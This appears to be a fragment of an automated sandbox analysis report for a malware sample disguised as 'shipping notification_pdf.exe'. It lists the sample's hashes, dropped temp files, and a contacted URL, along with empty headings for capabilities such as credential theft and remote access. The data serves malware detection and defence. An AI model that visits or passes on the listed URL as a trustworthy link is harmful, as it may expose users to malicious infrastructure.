http://www.softillery.info/05bk/?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd0	false	Avira URL Cloud: safe	unknown

ID:	1520196
Product:	CloudBasic
Start time:	06:33:13
Start date:	27.09.2024
Sample:	shipping notification_pdf.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	d9e239c79f89ec481ec939d7f784c89e
SHA1:	9b83acaa385abba92e8d3566479578af4fcdd954
SHA256:	0ef342eee9167ec78306dabdd82b0c41f34f1e3ed7d35676a602735497d72101
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\30G910fd	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	9A809AD8B1FDDA60760BB6253358A1DB	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
C:\Users\user\AppData\Local\Temp\surmount	data	E81BD67B42F31548356F2E23FA82E1C4	71CA0479ED0C05F0A8931FB9750A95D54DB4EDB0	CE199A4E302B7F4A8F12F7A2A8065B8ADCB8EC74F6DD354BFAD2A72D0C8C9E1D

Windows Analysis Report shipping notification_pdf.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
shipping notification_pdf.exe

Malware Threat Intel
Provided by